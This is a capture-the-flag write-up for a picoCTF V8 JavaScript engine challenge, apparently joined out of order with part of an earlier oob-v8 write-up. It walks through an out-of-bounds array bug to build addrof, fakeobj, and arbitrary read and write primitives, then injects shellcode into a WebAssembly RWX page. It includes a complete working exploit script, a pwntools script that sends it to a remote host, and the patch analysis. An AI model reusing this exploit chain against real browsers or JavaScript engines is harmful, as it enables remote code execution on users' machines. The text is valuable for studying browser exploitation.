var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

Then load up d8 under GDB. This version is a lot newer than the one from OOB-V8, so let's work out what is what.

$gdb d8
gef➤  run --allow-natives-syntax --shell exploit.js
d8> a = [1.5, 2.5]
[1.5, 2.5]
d8> %DebugPrint(a)
DebugPrint: 0xa5e08085179: [JSArray]
 - map: 0x0a5e082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - prototype: 0x0a5e0820ab61 <JSArray[0]>
 - elements: 0x0a5e08085161 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
 - length: 2
 - properties: 0x0a5e0804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0xa5e080446d1: [String] in ReadOnlySpace: #length: 0x0a5e0818215d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x0a5e08085161 <FixedDoubleArray[2]> {
           0: 1.5
           1: 2.5
 }
0xa5e082439f1: [Map]
 - type: JS_ARRAY_TYPE
 - instance size: 16
 - inobject properties: 0
 - elements kind: PACKED_DOUBLE_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - back pointer: 0x0a5e082439c9 <Map(HOLEY_SMI_ELEMENTS)>
 - prototype_validity cell: 0x0a5e08182405 <Cell value= 1>
 - instance descriptors #1: 0x0a5e0820b031 <DescriptorArray[1]>
 - transitions #1: 0x0a5e0820b07d <TransitionArray[4]>Transition array #1:
     0x0a5e08044fd5 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x0a5e08243a19 <Map(HOLEY_DOUBLE_ELEMENTS)>

 - prototype: 0x0a5e0820ab61 <JSArray[0]>
 - constructor: 0x0a5e0820a8f1 <JSFunction Array (sfi = 0xa5e0818ac31)>
 - dependent code: 0x0a5e080421b9 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
 - construction counter: 0

[1.5, 2.5]
gef➤  x/10gx 0xa5e08085179-1       <--- -1 needed due to pointer tagging!
0xa5e08085178:	0x0804222d082439f1	0x0000000408085161
0xa5e08085188:	0x58f55236080425a9	0x7566280a00000adc
0xa5e08085198:	0x29286e6f6974636e	0x20657375220a7b20
0xa5e080851a8:	0x3b22746369727473	0x6d2041202f2f0a0a
0xa5e080851b8:	0x76696e752065726f	0x7473206c61737265

Types and their Representation

So, right of the bat there are some differences. For example, look at the first value 0x0804222d082439f1. What on earth is that? Well, if you have eagle eyes or are familiar with a new V8 feature called pointer compression, you may notice that it lines up with the properties and the map:

 - map: 0x0a5e082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - properties: 0x0a5e0804222d <FixedArray[0]>

Notice that the last 4 bytes are being stored in that value 0x0804222d082439f1 - the first 4 bytes here at the last 4 bytes of the properties location, and the last 4 bytes are the last 4 of the map pointer.

This is a new feature added to V8 in 2020 called pointer compression, where the first 4 bytes of pointers are not stored as they are constant for all pointers - instead, a single reference is saved, and only the lower 4 bytes are stored. The higher 4 bytes, known as the isolate root, are stored in the R13 register. More information can be found in this blog post, but it's made a huge difference to performance. As well as pointers, smis have also changed representation - instead of being 32-bit values left-shifted by 32 bits to differentiate them from pointers, they are now simply doubled (left-shifted by one bit) and therefore also stored in 32-bit space.

A double is stored as its 64-bit binary representation
An smi is a 32-bit number, but it's stored as itself left-shifted by 1 so the bottom bit is null
- e.g. 0x12345678 is stored as 0x2468acf0
A pointer to an address addr is stored as addr | 1, that is the least significant bit is set to 1.
- e.g. 0x12345678 is stored as 0x12345679
- This helps differentiate it from an smi, but not from a double!

We can see the example of an smi in the second value from the x/10gx command above: 0x0000000408085161. The upper 4 bytes are 4, which is double 2, so this is the length of the list. The lower 4 bytes correspond to the pointer to the elements array, which stores the values themselves. Let's double-check that:

gef➤  x/4gx 0x0a5e08085161-1
0xa5e08085160:	0x0000000408042a99	0x3ff8000000000000
0xa5e08085170:	0x4004000000000000	0x0804222d082439f1

The first value 0x0000000408042a99 is the length smi (a value of 2, doubled as it's an smi) followed by what I assume is a pointer to the map. That's not important - what's important is the next two values are the floating-point representations of 1.5 and 2.5 (I recognise them from oob-v8!), while the value directly after is 0x0804222d082439f1, the properties and map pointer. This means our OOB can work as planned! We just have to ensure we preserve the top 32 bits of this value so we don't ruin the properties pointer.

Note that we don't know the upper 4 bytes, but that's not important!

Let's test that the OOB works as we expected by calling setHorsepower() on an array, and reading past the end.

d8> a.setHorsepower(5)
[1.5, 2.5, , , ]
d8> a[2]
4.763796150676345e-270
d8> ftoi(a[2]).toString(16)
"804222d082439f1"

Fantastic!

Complications while Grabbing Maps

This is a bit more complicated than in oob-v8, because of one simple fact: last time, we gained an addrof primitive using this:

var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();

var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();

function addrof(obj) {
    obj_arr[0] = obj;			// put desired obj for address leak into index 0
    obj_arr.oob(map_float);		// change to float map
    let leak = obj_arr[0];		// read address
    obj_arr.oob(map_obj);		// change back to object map, to prevent issues down the line
    return ftoi(leak);			// return leak as an integer
}

In our current scenario, you could argue that we can reuse this (with minor modifications) and get this:

var float_arr = [1.5, 2.5];
float_arr.setHorsepower(3);
var map_float = float_arr[2];

var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
obj_arr.setHorsepower(2);
var map_obj = obj_arr[1];

function addrof(obj) {
    obj_arr[0] = obj;			// put desired obj for address leak into index 0
    obj_arr[1] = map_float;		// change to float map
    let leak = obj_arr[0];		// read address
    obj_arr[1] = map_obj;		// change back to object map, to prevent issues down the line
    return ftoi(leak);			// return leak as an integer
}

However, this does not work. Why? It's the difference between these two lines:

var map_obj = obj_arr.oob();
var map_obj = obj_arr[1];

In oob-v8, we noted that the function .oob() not only reads an index past the end, but it also returns it as a double. And that's the key difference - in this challenge, we can read past the end of the array, but this time it's treated as an object. obj_arr[1] will, therefore, return an object - and a pretty invalid one, at that!

You might be thinking that we don't need the object map to get an addrof primitive at all, we just can't set the map back, but we can create a one-use array. I spent an age working out why it didn't work, instead returning a NaN, but of course it was this line:

obj_arr[1] = map_float;

Setting the map to that of a float array would never work, as it would treat the first index like an object again!

A new addrof()

So, this time we can't copy the object map so easily. But not all is lost! Instead of having a single OOB read/write, we can set the array to have a huge length. This way, we can use an OOB on the float array to read the map of the object array - if we set it correctly, that is.

Aligning Memory

Let's create two arrays, one of floats and one of objects. We'll also grab the float map (which will also contain the properties pointer!) while we're at it.

var float_arr = [1.5, 2.5];
float_arr.setHorsepower(50);
var float_map = float_arr[2];             // both map and properties


var initial_obj = {a:1};	          // placeholder object
var obj_arr = [initial_obj];
obj_arr.setHorsepower(50);

My initial thought was to create an array like this:

var obj_arr = [3.5, 3.5, initial_obj];

And then I could slowly increment the index of float_arr, reading along in memory until we came across two 3.5 values in a row. I would then know that the location directly after was our desired object, making a reliable leak. Unfortunately, while debugging, it seems like mixed arrays are not quite that simple (unsurprisingly, perhaps). Instead, I'm gonna hope and pray that the offset is constant (and if it's not, we'll come back and play with the mixed array further).

Let's determine the offset. I'm gonna %DebugPrint float_arr, obj_arr and initial_obj:

DebugPrint: 0x30e008085931: [JSArray]
 - map: 0x30e0082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - prototype: 0x30e00820ab61 <JSArray[0]>
 - elements: 0x30e008085919 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
 - length: 50
 - properties: 0x30e00804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x30e0080446d1: [String] in ReadOnlySpace: #length: 0x30e00818215d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x30e008085919 <FixedDoubleArray[2]> {
           0: 1.5
           1: 2.5
 }
DebugPrint: 0x30e008085985: [JSArray]
 - map: 0x30e008243a41 <Map(PACKED_ELEMENTS)> [FastProperties]
 - prototype: 0x30e00820ab61 <JSArray[0]>
 - elements: 0x30e008085979 <FixedArray[1]> [PACKED_ELEMENTS]
 - length: 50
 - properties: 0x30e00804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x30e0080446d1: [String] in ReadOnlySpace: #length: 0x30e00818215d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x30e008085979 <FixedArray[1]> {
           0: 0x30e00808594d <Object map = 0x30e0082459f9>
 }

DebugPrint: 0x30e00808594d: [JS_OBJECT_TYPE]
 - map: 0x30e0082459f9 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x30e008202f11 <Object map = 0x30e0082421b9>
 - elements: 0x30e00804222d <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x30e00804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x30e0080477ed: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
 }

Let's check the obj_arr first:

gef➤  x/6gx 0x30e008085979-1
0x30e008085978:	0x0000000208042205	0x08243a410808594d
0x30e008085988:	0x080859790804222d	0x080425a900000064
0x30e008085998:	0x0000000400000003	0x0000000029386428

In line with what we get from %DebugPrint(), we get the lower 4 bytes of 0808594d. If we print from elements onwards for the float_arr:

gef➤  x/20gx 0x30e008085919-1 
0x30e008085918:	0x0000000408042a99	0x3ff8000000000000
0x30e008085928:	0x4004000000000000	0x0804222d082439f1
0x30e008085938:	0x0000006408085919	0x082439f1080423d1
0x30e008085948:	0x082459f90804222d	0x0804222d0804222d
0x30e008085958:	0x08045a0100000002	0x0000000000010001
0x30e008085968:	0x080477ed080421f9	0x0000000200000088
0x30e008085978:	0x0000000208042205	0x08243a410808594d
0x30e008085988:	0x080859790804222d	0x080425a900000064
0x30e008085998:	0x0000000400000003	0x0000000029386428
0x30e0080859a8:	0x0000000000000000	0x0000000000000000

We can see the value 0x08243a410808594d at 0x30e008085980. If the value 1.5 at 0x22f908085370 is index 0, we can count and get an index of 12. Let's try that:

function addrof(obj) {
    obj_arr[0] = obj;
    let leak = float_arr[12];
    return ftoi(leak);
}

%DebugPrint(initial_obj);
console.log("Leak: 0x" + addrof(initial_obj).toString(16))

And from the output, it looks very promising!

Leak: 0x8243a410808593d
DebugPrint: 0x28a60808593d: [JS_OBJECT_TYPE]
 - map: 0x28a6082459f9 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x28a608202f11 <Object map = 0x28a6082421b9>
 - elements: 0x28a60804222d <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x28a60804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x28a6080477ed: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
 }

The lower 4 bytes match up perfectly. We're gonna return just the last 4 bytes:

return ftoi(leak) & 0xffffffffn;

And bam, we have an addrof() primitive. Time to get a fakeobj().

A new fakeobj()

If we follow the same principle for fakeobj() :

function fakeobj(compressed_addr) {
    float_arr[12] = itof(compressed_addr);
    return obj_arr[0];
}

However, remember that pointer compression is a thing! We have to make sure the upper 4 bytes are consistent. This isn't too bad, as we can read it once and remember it for all future sets:

// store upper 4 bytes of leak
let upper = ftoi(float_arr[12]) & (0xffffffffn << 32n);

And then fakeobj() becomes

function fakeobj(compressed_addr) {
    float_arr[12] = itof(upper + compressed_addr);
    return obj_arr[0];
}

We can test this with the following code:

// first leak the address
let addr_initial = addrof(initial_obj);
// now try and create an object from it
let fake = fakeobj(addr_initial);
// fake should now be pointing to initial_obj
// meaning fake.a should be 1
console.log(fake.a);

If I run this, it does in fact print 1:

gef➤  run --allow-natives-syntax --shell exploit.js
1
V8 version 9.1.0 (candidate)
d8>

I was as impressed as anybody that this actually worked, I can't lie.

Arbitrary Read

Once again, we're gonna try and gain an arbitrary read by creating a fake array object that we can control the elements pointer for. The offsets are gonna be slightly different due to pointer compression. As we saw earlier, the first 8 bytes are the compressed pointer for properties and map, while the second 8 bytes are the smi for length and then the compressed pointer for elements. Let's create an initial arb_rw_array like before, and print out the layout:

var arb_rw_arr = [float_map, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));

%DebugPrint(arb_rw_arr)

[+] Address of Arbitrary RW Array: 0x8085a01
DebugPrint: 0x161c08085a01: [JSArray]
 - map: 0x161c082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - prototype: 0x161c0820ab61 <JSArray[0]>
 - elements: 0x161c080859d9 <FixedDoubleArray[4]> [PACKED_DOUBLE_ELEMENTS]
 - length: 4
 - properties: 0x161c0804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x161c080446d1: [String] in ReadOnlySpace: #length: 0x161c0818215d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x161c080859d9 <FixedDoubleArray[4]> {
           0: 4.7638e-270
           1: 1.5
           2: 2.5
           3: 3.5
 }

The leak works perfectly. Once again, elements is ahead of the JSArray itself.

If we want to try and fake an array with compression pointers then we have the following format:

32-bit pointer to properties
32-bit pointer to map
smi for length
32-bit pointer to elements

The first ones we have already solved with float_map. We can fix the latter like this:

function arb_read(compressed_addr) {
    // tag pointer
    if (compressed_addr % 2n == 0)
        compressed_addr += 1n;

    // place a fake object over the elements of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20 
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array
    // size of 2 and elements pointer
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr);

    // index 0 will returns the arbitrary read value
    return ftoi(fake[0]);
}

We can test the arbitrary read, and I'm going to do this by grabbing the float_map location and reading the data there:

// test arb_read
let float_map_lower = ftoi(float_map) & 0xffffffffn
console.log("Map at: 0x" + float_map_lower.toString(16))
console.log("Read: 0x" + arb_read(float_map_lower).toString(16));

Map at: 0x82439f1
Read: 0xa0007ff2100043d

A little bit of inspection at the location of float_map shows us we're 8 bytes off:

gef➤  x/10gx 0x3f09082439f1-1
0x3f09082439f0:	0x1604040408042119	0x0a0007ff2100043d
0x3f0908243a00:	0x082439c90820ab61	0x080421b90820b031
0x3f0908243a10:	0x0820b07d08182405	0x1604040408042119

This is because the first 8 bytes in the elements array are for the length smi and then for a compressed map pointer, so we just subtract if 8 and get a valid arb_read():

function arb_read(compressed_addr) {
    // tag pointer
    if (compressed_addr % 2n == 0)
        compressed_addr += 1n;

    // place a fake object over the elements of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array
    // size of 2 and elements pointer
    // initially with the map and a size smi, so 0x8 offset
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);

    // index 0 will returns the arbitrary read value
    return ftoi(fake[0]);
}

Arbitrary Write

Initial

We can continue with the initial_arb_write() from oob-v8, with a couple of minor changes:

function initial_arb_write(compressed_addr, val) {
    // place a fake object and change elements, as before
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);

    // Write to index 0
    fake[0] = itof(BigInt(val));
}

We can test this super easily too, with the same principle:

let float_map_lower = ftoi(float_map) & 0xffffffffn;
console.log("Map at: 0x" + float_map_lower.toString(16));
initial_arb_write(float_map_lower, 0x12345678n);

Observing the map location in GDB tells us the write worked:

gef➤  x/4gx 0xf84082439f1-1
0xf84082439f0:	0x0000000012345678	0x0a0007ff2100043d
0xf8408243a00:	0x082439c90820ab61	0x080421b90820b031

Full

Last time we improved our technique by usingArrayBuffer backing pointers. This is a bit harder this time because for this approach you need to know the full 64-bit pointers, not just the compressed version. This is genuinely very difficult because the isolate root is stored in the r13 register, not anywhere in memory. As a result, we're going to be using initial_arb_write() as if it's arb_write(), and hoping it works.

If anybody knows of a way to leak the isolate root, please let me know!

Shellcoding

The final step is to shellcode our way through, using the same technique as last time. The offsets are slightly different, but I'm sure that by this point you can find them yourself!

First I'll use any WASM code to create the RWX page, like I did for oob-v8:

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

Again, this generates an RWX page:

gef➤  vmmap
[...]
0x000007106675a000 0x000007106675b000 0x0000000000000000 rwx 
[...]

Using the same technique of printing out the wasm_instance address and comparing it to the output of search-pattern from before:

gef➤  search-pattern 0x000007106675a000
[+] Searching '\x00\xa0\x75\x66\x10\x07\x00\x00' in memory
[+] In (0x3c108200000-0x3c108280000), permission=rw-
  0x3c108211ad4 - 0x3c108211af4  →   "\x00\xa0\x75\x66\x10\x07\x00\x00[...]"
  [...]

I get an offset of 0x67. In reality it is 0x68 (pointer tagging!), but who cares.

Now we can use the ArrayBuffer technique, because we know all the bits of the address! We can just yoink it directly from the oob-v8 writeup (slightly changing 0x20 to 0x14, as that is the new offset with compression):

function copy_shellcode(addr, shellcode) {
    // create a buffer of 0x100 bytes
    let buf = new ArrayBuffer(0x100);
    let dataview = new DataView(buf);
    
    // overwrite the backing store so the 0x100 bytes can be written to where we want
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x14n;
    arb_write(backing_store_addr, addr);

    // write the shellcode 4 bytes at a time
    for (let i = 0; i < shellcode.length; i++) {
	dataview.setUint32(4*i, shellcode[i], true);
    }
}

I am going to grab the shellcode for cat flag.txt from this writeup, because I suck ass at working out endianness and it's a lot of effort for a fail :)))

payload = [0x0cfe016a, 0x2fb84824, 0x2f6e6962, 0x50746163, 0x68e78948, 0x7478742e, 0x0101b848, 0x01010101, 0x48500101, 0x756062b8, 0x606d6701, 0x04314866, 0x56f63124, 0x485e0c6a, 0x6a56e601, 0x01485e10, 0x894856e6, 0x6ad231e6, 0x050f583b]
copy_shellcode(rwx_base, payload);
f();

Running this:

$ ./d8 exploit.js 
[+] Address of Arbitrary RW Array: 0x8086551
[+] RWX Region located at 0xf06b12a5000
cat: flag.txt: No such file or directory

Ok, epic! Let's deliver it remote using the same script as Kit Engine:

from pwn import *

with open("exploit.js", "rb") as f:
    exploit = f.read()

p = remote('mercury.picoctf.net', 60233)
p.sendlineafter(b'5k:', str(len(exploit)).encode())
p.sendlineafter(b'please!!\n', exploit)

p.recvuntil(b"Stdout b'")
flag = p.recvuntil(b"\\")[:-1]
print(flag.decode())

And we get the flag!

$ python3 deliver.py 
[+] Opening connection to mercury.picoctf.net on port 60233: Done
picoCTF{sh0u1d_hAv3_d0wnl0ad3d_m0r3_rAm_3a9ef72562166255}
[*] Closed connection to mercury.picoctf.net port 60233

Full Exploit

// setup
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

// addrof and fakeobj
var float_arr = [1.5, 2.5];
float_arr.setHorsepower(50);
var float_map = float_arr[2];       // both map and properties


var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
obj_arr.setHorsepower(50);


// store upper 4 bytes of leak
let upper = ftoi(float_arr[12]) & (0xffffffffn << 32n);

function addrof(obj) {
    obj_arr[0] = obj;
    let leak = float_arr[12];
    return ftoi(leak) & 0xffffffffn;
}

function fakeobj(compressed_addr) {
    float_arr[12] = itof(upper + compressed_addr);
    return obj_arr[0];
}

/* test addrof and fakeobj
// first leak the address
let addr_initial = addrof(initial_obj);
// now try and create an object from it
let fake = fakeobj(addr_initial);
// fake should now be pointing to initial_obj
// meaning fake.a should be 1
console.log(fake.a);
*/

// array for access to arbitrary memory addresses
var arb_rw_arr = [float_map, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));
// %DebugPrint(arb_rw_arr);

function arb_read(compressed_addr) {
    // tag pointer
    if (compressed_addr % 2n == 0)
        compressed_addr += 1n;

    // place a fake object over the elements of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array
    // size of 2 and elements pointer
    // initially with the map and a size smi, so 0x8 offset
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);

    // index 0 will returns the arbitrary read value
    return ftoi(fake[0]);
}

/* test arb_read
let float_map_lower = ftoi(float_map) & 0xffffffffn;
console.log("Map at: 0x" + float_map_lower.toString(16));
console.log("Read: 0x" + arb_read(float_map_lower).toString(16));
*/

// would normally be initial, but we hope and pray
function arb_write(compressed_addr, val) {
    // place a fake object and change elements, as before
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);

    // Write to index 0
    fake[0] = itof(BigInt(val));
}

/* test initial_arb_write
let float_map_lower = ftoi(float_map) & 0xffffffffn;
console.log("Map at: 0x" + float_map_lower.toString(16));
initial_arb_write(float_map_lower, 0x12345678n);
*/

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

let rwx_pointer_loc = addrof(wasm_instance) + 0x67n;
let rwx_base = arb_read(rwx_pointer_loc);
console.log("[+] RWX Region located at 0x" + rwx_base.toString(16));

//
function copy_shellcode(addr, shellcode) {
    // create a buffer of 0x100 bytes
    let buf = new ArrayBuffer(0x100);
    let dataview = new DataView(buf);
    
    // overwrite the backing store so the 0x100 bytes can be written to where we want
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x14n;
    arb_write(backing_store_addr, addr);

    // write the shellcode 4 bytes at a time
    for (let i = 0; i < shellcode.length; i++) {
	dataview.setUint32(4*i, shellcode[i], true);
    }
}

payload = [0x0cfe016a, 0x2fb84824, 0x2f6e6962, 0x50746163, 0x68e78948, 0x7478742e, 0x0101b848, 0x01010101, 0x48500101, 0x756062b8, 0x606d6701, 0x04314866, 0x56f63124, 0x485e0c6a, 0x6a56e601, 0x01485e10, 0x894856e6, 0x6ad231e6, 0x050f583b]
copy_shellcode(rwx_base, payload);
f();

// picoCTF{sh0u1d_hAv3_d0wnl0ad3d_m0r3_rAm_3a9ef72562166255}

The Challenge

The actual challenge

The Patch

Let's first read the patch itself:

diff --git a/src/bootstrapper.cc b/src/bootstrapper.cc
index b027d36..ef1002f 100644
--- a/src/bootstrapper.cc
+++ b/src/bootstrapper.cc
@@ -1668,6 +1668,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
                           Builtins::kArrayPrototypeCopyWithin, 2, false);
     SimpleInstallFunction(isolate_, proto, "fill",
                           Builtins::kArrayPrototypeFill, 1, false);
+    SimpleInstallFunction(isolate_, proto, "oob",
+                          Builtins::kArrayOob,2,false);
     SimpleInstallFunction(isolate_, proto, "find",
                           Builtins::kArrayPrototypeFind, 1, false);
     SimpleInstallFunction(isolate_, proto, "findIndex",
diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
index 8df340e..9b828ab 100644
--- a/src/builtins/builtins-array.cc
+++ b/src/builtins/builtins-array.cc
@@ -361,6 +361,27 @@ V8_WARN_UNUSED_RESULT Object GenericArrayPush(Isolate* isolate,
   return *final_length;
 }
 }  // namespace
+BUILTIN(ArrayOob){
+    uint32_t len = args.length();
+    if(len > 2) return ReadOnlyRoots(isolate).undefined_value();
+    Handle<JSReceiver> receiver;
+    ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+            isolate, receiver, Object::ToObject(isolate, args.receiver()));
+    Handle<JSArray> array = Handle<JSArray>::cast(receiver);
+    FixedDoubleArray elements = FixedDoubleArray::cast(array->elements());
+    uint32_t length = static_cast<uint32_t>(array->length()->Number());
+    if(len == 1){
+        //read
+        return *(isolate->factory()->NewNumber(elements.get_scalar(length)));
+    }else{
+        //write
+        Handle<Object> value;
+        ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+                isolate, value, Object::ToNumber(isolate, args.at<Object>(1)));
+        elements.set(length,value->Number());
+        return ReadOnlyRoots(isolate).undefined_value();
+    }
+}
 
 BUILTIN(ArrayPush) {
   HandleScope scope(isolate);
diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
index 0447230..f113a81 100644
--- a/src/builtins/builtins-definitions.h
+++ b/src/builtins/builtins-definitions.h
@@ -368,6 +368,7 @@ namespace internal {
   TFJ(ArrayPrototypeFlat, SharedFunctionInfo::kDontAdaptArgumentsSentinel)     \
   /* https://tc39.github.io/proposal-flatMap/#sec-Array.prototype.flatMap */   \
   TFJ(ArrayPrototypeFlatMap, SharedFunctionInfo::kDontAdaptArgumentsSentinel)  \
+  CPP(ArrayOob)                                                                \
                                                                                \
   /* ArrayBuffer */                                                            \
   /* ES #sec-arraybuffer-constructor */                                        \
diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
index ed1e4a5..c199e3a 100644
--- a/src/compiler/typer.cc
+++ b/src/compiler/typer.cc
@@ -1680,6 +1680,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
       return Type::Receiver();
     case Builtins::kArrayUnshift:
       return t->cache_->kPositiveSafeInteger;
+    case Builtins::kArrayOob:
+      return Type::Receiver();
 
     // ArrayBuffer functions.
     case Builtins::kArrayBufferIsView:

In essence, there is a new function ArrayOob that is implemented. We can see it's added to the array object as a .oob() method:

+    SimpleInstallFunction(isolate_, proto, "oob",
+                          Builtins::kArrayOob,2,false);

There's the odd bit of other stuff thrown around for getting it working, but the actual source of the challenge is (unsurprisingly) ArrayOob itself (with a name like that, who would have thought?). Cleaned up a little, it looks like this:

BUILTIN(ArrayOob){
    uint32_t len = args.length();
    if(len > 2) return ReadOnlyRoots(isolate).undefined_value();
    
    Handle<JSReceiver> receiver;
    ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
        isolate, receiver, Object::ToObject(isolate, args.receiver())
    );
    
    Handle<JSArray> array = Handle<JSArray>::cast(receiver);
    FixedDoubleArray elements = FixedDoubleArray::cast(array->elements());
    uint32_t length = static_cast<uint32_t>(array->length()->Number());
    
    if(len == 1) {
        //read
        return *(isolate->factory()->NewNumber(elements.get_scalar(length)));
    } else {
        //write
        Handle<Object> value;
        ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
            isolate, value, Object::ToNumber(isolate, args.at<Object>(1))
        );
        elements.set(length,value->Number());
        return ReadOnlyRoots(isolate).undefined_value();
    }
}

Familiarity with the V8 codebase is unlikely, and even if you are familiar with it, it's unlikely you can read it like a native language.

It looks at the number of arguments the function takes, then stores it in len
- If len is greater than 2, it throws an error (note that the first argument is always this, so in reality it's just one).
It then gets the array in question, stored in array
array is cast to a FixedDoubleArray, an array of fixed size that stores doubles, called elements
- The length of the array is stored in length
If there is no argument (len == 1, i.e. only this is passed) then elements[length] is returned as a number
- This is a clear Out-Of-Bounds (OOB) Read, as arrays in javascript are zero-indexed like most other programming languages
If an argument is given, elements[length] is set to the value that is the argument cast to a Number with Object::ToNumber
- This is a clear Out-Of-Bounds (OOB) Write, for the same reason as above

So we have a very clear OOB vulnerability, allowing both a read and a write to one index further than the maximum length of the array. This begs an important question: what exists past the end of an array?

First, let's talk about data types in V8 and how they are represented.

Values and their Types

V8 uses pointers, doubles and smis (standing for immediate small integers). Since it has to distinguish between these values, they are all stored in memory with slight differences.

A double is stored as its 64-bit binary representation (easy)
An smi is a 32-bit number, but it's stored as itself left-shifted by 32 so the bottom 32 bits are null
- e.g. 0x12345678 is stored as 0x1234567800000000
A pointer to an address addr is stored as addr | 1, that is the least significant bit is set to 1.
- e.g. 0x12345678 is stored as 0x12345679
- This helps differentiate it from an smi, but not from a double!

Saelo's paper refers to pointers as HeapObjects as well.

Integers in V8

Any output you get will always be in floating-point form; this is because V8 actually doesn't have a way to express 64-bit integers normally. We need a way to convert floating-point outputs to hexadecimal addresses (and vice versa!). To do this, we'll use the standard approach, which is as follows:

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

You'll see these functions in most V8 exploits. They essentially just convert between interpreting data as floating-point form or as integers.

